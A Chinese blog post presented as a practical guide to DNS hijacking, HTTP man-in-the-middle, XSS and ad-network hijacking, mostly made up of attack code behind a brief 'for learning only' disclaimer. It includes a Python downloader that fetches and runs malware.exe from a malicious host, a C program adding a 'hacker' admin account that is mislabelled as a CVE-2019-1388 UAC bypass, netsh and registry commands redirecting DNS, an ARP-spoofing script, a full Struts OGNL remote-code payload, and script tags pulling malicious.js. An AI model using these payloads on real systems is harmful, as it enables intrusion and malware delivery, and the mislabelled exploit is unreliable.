关于DNS劫持、HTTP劫持、内容注入和广告劫持的详细分析-实战篇
suiw9 2024-11-17 01:39 44 浏览 0 评论
仅供学习研究交流使用,切勿用于违法犯罪,为维护网络安全做贡献!
一、DNS劫持
1. 修改本地DNS设置
步骤一:物理访问或恶意软件感染
恶意软件感染:
- 攻击者通过钓鱼邮件或恶意网站诱导用户下载并运行恶意软件。
python
复制代码
# 示例Python代码,恶意软件伪装成合法软件 import os def download_payload(): # 下载恶意软件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 执行下载的恶意软件 os.system("malware.exe") download_payload() execute_payload()
步骤二:获取管理员权限
提权方法:
- 恶意软件利用系统漏洞提升权限,例如通过Windows UAC绕过或使用已知的提权漏洞。
示例漏洞:CVE-2019-1388
- CVE-2019-1388是一个Windows UAC绕过漏洞,攻击者可以通过伪造的签名窗口提升权限。
利用示例:
- 创建恶意文件:
c
复制代码
// Exploit.c: 利用CVE-2019-1388的UAC绕过漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); shExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd = NULL; shExecInfo.lpVerb = "runas"; // 请求管理员权限 shExecInfo.lpFile = "cmd.exe"; // 要运行的程序 shExecInfo.lpParameters = "/c net user hacker Password123! /add"; // 创建新用户 shExecInfo.lpDirectory = NULL; shExecInfo.nShow = SW_SHOWNORMAL; shExecInfo.hInstApp = NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }
- 编译并运行恶意文件:
shell
复制代码
gcc Exploit.c -o Exploit.exe Exploit.exe
步骤三:修改DNS设置
使用命令提示符:
shell
复制代码
# 修改DNS设置,将DNS服务器地址更改为攻击者控制的DNS服务器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5
修改注册表:
shell
复制代码
# 示例命令,修改注册表中的DNS设置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f
步骤四:DNS解析劫持
- 当用户访问合法域名时,DNS请求被发送到攻击者控制的DNS服务器,返回伪造的IP地址,重定向用户到恶意网站。
2. 攻击DNS服务器
步骤一:识别目标DNS服务器
- 使用工具如nslookup、whois或dig来识别DNS服务器的IP地址和相关信息。
shell
复制代码
# 使用nslookup识别DNS服务器 nslookup example.com
步骤二:漏洞利用或暴力破解
- 利用DNS服务器软件的已知漏洞,例如BIND DNS服务器中的漏洞CVE-2020-8617,或通过暴力破解获取管理员权限。
shell
复制代码
# 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit
步骤三:篡改DNS解析记录
- 登录DNS服务器的管理界面,修改DNS解析记录,将合法域名解析为恶意IP地址。
shell
复制代码
# 例如,在BIND DNS服务器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析记录 zone "example.com" { type master; file "/etc/bind/db.example.com"; };
步骤四:劫持用户请求
- 所有请求该DNS服务器解析域名的用户都会被重定向到恶意网站。
二、HTTP劫持
中间人攻击(MITM)
步骤一:建立中间人位置
ARP欺骗:
python
复制代码
# 使用scapy库进行ARP欺骗 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:将目标IP的网关MAC地址更改为攻击者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')
步骤二:拦截HTTP请求
捕获HTTP流量:
shell
复制代码
# 使用Wireshark或tcpdump捕获HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'
步骤三:篡改HTTP响应
使用Burp Suite拦截并修改HTTP响应:
- 在Burp Suite中设置拦截规则,拦截HTTP响应并插入恶意代码。
html
复制代码
<!-- 插入恶意JavaScript代码的示例 --> <script>alert('This site is hacked');</script>
步骤四:执行恶意代码
- 用户浏览器接收并执行篡改后的HTTP响应,执行其中的恶意代码。
三、内容注入
XSS(跨站脚本)攻击
步骤一:发现注入点
- 攻击者在论坛、评论区或其他用户输入区域进行测试,寻找可以插入JavaScript代码的注入点。
步骤二:构造恶意代码
html
复制代码
<!-- 示例:构造包含恶意JavaScript代码的输入 --> <script>alert('XSS');</script>
步骤三:注入恶意代码
- 攻击者将恶意代码输入到注入点,提交表单或发布评论。
步骤四:执行恶意代码
- 服务器未对输入进行适当过滤,直接返回包含恶意代码的响应。用户浏览器执行恶意代码,攻击者实现控制。
四、广告劫持
劫持第三方广告网络
步骤一:识别目标广告网络
- 攻击者通过分析广告脚本和网络流量,确定广告网络的来源和结构。
javascript
复制代码
// 分析广告脚本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));
步骤二:漏洞利用或社会工程学
- 利用广告网络的漏洞或通过社会工程学手段获取广告网络管理权限。
示例漏洞:CVE-2018-11776
- 这是一个Apache Struts的远程代码执行漏洞,攻击者可以通过特定的输入导致远程代码执行。
利用示例:
- 创建恶意请求:
http
复制代码
POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
- 发送恶意请求:
- 使用工具如curl或Burp Suite发送恶意请求,触发漏洞。
步骤三:替换广告内容
- 攻击者登录广告网络管理界面,将合法广告替换为恶意广告,内容包括恶意JavaScript代码或重定向链接。
html
复制代码
<!-- 替换广告内容为恶意广告 --> <script src="http://malicious-website.com/malicious.js"></script>
步骤四:加载恶意广告
- 用户浏览包含被劫持广告的网页时,恶意广告加载并执行,其中的恶意代码或重定向链接开始运行。
html
复制代码
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 恶意广告加载 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>
结论
通过详细的步骤和代码示例,我们可以更清楚地了解DNS劫持、HTTP劫持、内容注入和广告劫持的实现方式。这些攻击手段对用户和网络安全构成严重威胁,但通过了解其原理和实现细节,我们可以采取更有效的防护措施,保护我们的网络环境和数据安全。如果你有任何问题或想法,请在评论区分享,我们一起探讨。
相关推荐
- 俄罗斯的 HTTPS 也要被废了?(俄罗斯网站关闭)
-
发布该推文的ScottHelme是一名黑客,SecurityHeaders和ReportUri的创始人、Pluralsight作者、BBC常驻黑客。他表示,CAs现在似乎正在停止为俄罗斯域名颁发...
- 如何强制所有流量使用 HTTPS一网上用户
-
如何强制所有流量使用HTTPS一网上用户使用.htaccess强制流量到https的最常见方法可能是使用.htaccess重定向请求。.htaccess是一个简单的文本文件,简称为“.h...
- https和http的区别(https和http有何区别)
-
“HTTPS和HTTP都是数据传输的应用层协议,区别在于HTTPS比HTTP安全”。区别在哪里,我们接着往下看:...
- 快码住!带你十分钟搞懂HTTP与HTTPS协议及请求的区别
-
什么是协议?网络协议是计算机之间为了实现网络通信从而达成的一种“约定”或“规则”,正是因为这个“规则”的存在,不同厂商的生产设备、及不同操作系统组成的计算机之间,才可以实现通信。简单来说,计算机与网络...
- 简述HTTPS工作原理(简述https原理,以及与http的区别)
-
https是在http协议的基础上加了一层SSL(由网景公司开发),加密由ssl实现,它的目的是为用户提供对网站服务器的身份认证(需要CA),以至于保护交换数据的隐私和完整性,原理如图示。1、客户端发...
- 21、HTTPS 有几次握手和挥手?HTTPS 的原理什么是(高薪 常问)
-
HTTPS是3次握手和4次挥手,和HTTP是一样的。HTTPS的原理...
- 一次安全可靠的通信——HTTPS原理
-
为什么HTTPS协议就比HTTP安全呢?一次安全可靠的通信应该包含什么东西呢,这篇文章我会尝试讲清楚这些细节。Alice与Bob的通信...
- 为什么有的网站没有使用https(为什么有的网站点不开)
-
有的网站没有使用HTTPS的原因可能涉及多个方面,以下是.com、.top域名的一些见解:服务器性能限制:HTTPS使用公钥加密和私钥解密技术,这要求服务器具备足够的计算能力来处理加解密操作。如果服务...
- HTTPS是什么?加密原理和证书。SSL/TLS握手过程
-
秘钥的产生过程非对称加密...
- 图解HTTPS「转」(图解http 完整版 彩色版 pdf)
-
我们都知道HTTPS能够加密信息,以免敏感信息被第三方获取。所以很多银行网站或电子邮箱等等安全级别较高的服务都会采用HTTPS协议。...
- HTTP 和 HTTPS 有何不同?一文带你全面了解
-
随着互联网时代的高速发展,Web服务器和客户端之间的安全通信需求也越来越高。HTTP和HTTPS是两种广泛使用的Web通信协议。本文将介绍HTTP和HTTPS的区别,并探讨为什么HTTPS已成为We...
- HTTP与HTTPS的区别,详细介绍(http与https有什么区别)
-
HTTP与HTTPS介绍超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的...
- 一文让你轻松掌握 HTTPS(https详解)
-
一文让你轻松掌握HTTPS原文作者:UC国际研发泽原写在最前:欢迎你来到“UC国际技术”公众号,我们将为大家提供与客户端、服务端、算法、测试、数据、前端等相关的高质量技术文章,不限于原创与翻译。...
- 如何在Spring Boot应用程序上启用HTTPS?
-
HTTPS是HTTP的安全版本,旨在提供传输层安全性(TLS)[安全套接字层(SSL)的后继产品],这是地址栏中的挂锁图标,用于在Web服务器和浏览器之间建立加密连接。HTTPS加密每个数据包以安全方...
- 一文彻底搞明白Http以及Https(http0)
-
早期以信息发布为主的Web1.0时代,HTTP已可以满足绝大部分需要。证书费用、服务器的计算资源都比较昂贵,作为HTTP安全扩展的HTTPS,通常只应用在登录、交易等少数环境中。但随着越来越多的重要...
你 发表评论:
欢迎- 一周热门
-
-
Linux:Ubuntu22.04上安装python3.11,简单易上手
-
宝马阿布达比分公司推出独特M4升级套件,整套升级约在20万
-
MATLAB中图片保存的五种方法(一)(matlab中保存图片命令)
-
别再傻傻搞不清楚Workstation Player和Workstation Pro的区别了
-
Linux上使用tinyproxy快速搭建HTTP/HTTPS代理器
-
如何提取、修改、强刷A卡bios a卡刷bios工具
-
Element Plus 的 Dialog 组件实现点击遮罩层不关闭对话框
-
日本组合“岚”将于2020年12月31日停止团体活动
-
SpringCloud OpenFeign 使用 okhttp 发送 HTTP 请求与 HTTP/2 探索
-
tinymce 号称富文本编辑器世界第一,大家同意么?
-
- 最近发表
- 标签列表
-
- dialog.js (57)
- importnew (44)
- windows93网页版 (44)
- yii2框架的优缺点 (45)
- tinyeditor (45)
- qt5.5 (60)
- windowsserver2016镜像下载 (52)
- okhttputils (51)
- android-gif-drawable (53)
- 时间轴插件 (56)
- docker systemd (65)
- slider.js (47)
- android webview缓存 (46)
- pagination.js (59)
- loadjs (62)
- openssl1.0.2 (48)
- velocity模板引擎 (48)
- pcre library (47)
- zabbix微信报警脚本 (63)
- jnetpcap (49)
- pdfrenderer (43)
- fastutil (48)
- uinavigationcontroller (53)
- bitbucket.org (44)
- python websocket-client (47)